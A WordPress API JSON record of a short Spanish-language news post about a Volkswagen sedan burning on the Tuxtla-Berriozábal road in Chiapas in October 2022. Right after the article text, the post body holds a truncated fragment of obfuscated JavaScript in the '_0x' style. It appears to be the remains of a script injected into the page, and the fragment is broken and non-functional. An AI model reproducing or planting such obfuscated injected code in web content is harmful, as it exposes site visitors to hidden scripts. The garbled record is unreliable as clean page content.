{"id":5745,"date":"2022-10-10T01:10:08","date_gmt":"2022-10-10T01:10:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5745"},"modified":"2022-10-10T01:10:08","modified_gmt":"2022-10-10T01:10:08","slug":"se-incendia-vocho-en-el-tramo-berriozabal-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5745","title":{"rendered":"Se incendia vocho en el tramo Berrioz\u00e1bal-Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221009-WA0008-1024x768.jpg\" alt=\"\" class=\"wp-image-5746\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221009-WA0008-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221009-WA0008-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221009-WA0008-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221009-WA0008.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 9 de octubre del 2022. Tuxtla Guti\u00e9rrez.- Por un presunto corto circuito un Volkswagen sed\u00e1n se incendi\u00f3 cuando circulaba en el tramo Tuxtla-Berrioz\u00e1bal.La unidad de color rojo comenz\u00f3 a incendiarse a unos 500 metros pasando el ret\u00e9n del punto conocido como La Pochota cerca de las tres de la tarde.Inmediatamente los ocupantes bajaron y llamaron a los n\u00fameros de emergencias.Al lugar arribaron elementos del Her\u00f3ico  Cuerpo de Bomberos Estaci\u00f3n  Poniente  de esta capital  para sofocar el incendio con una unidad de ataque r\u00e1pido.Por ello se detuvo la circulaci\u00f3n en el carril de Oriente a Poniente.El vocho qued\u00f3 reducido a cenizas, y fue llevado por una gr\u00faa a un corral\u00f3n en turno para determinar la situaci\u00f3n jur\u00eddica.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 9 de octubre del 2022. Tuxtla Guti\u00e9rrez.- Por un presunto corto circuito un Volkswagen sed\u00e1n se incendi\u00f3 cuando circulaba en el tramo Tuxtla-Berrioz\u00e1bal.La unidad de color rojo comenz\u00f3 a incendiarse a unos 500 metros pasando el ret\u00e9n del punto conocido como La Pochota cerca de las tres de la tarde.Inmediatamente los ocupantes &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5746,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-5745","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5745","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5745"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5745\/revisions"}],"predecessor-version":[{"id":5747,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5745\/revisions\/5747"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5746"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5745"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5745"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5745"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}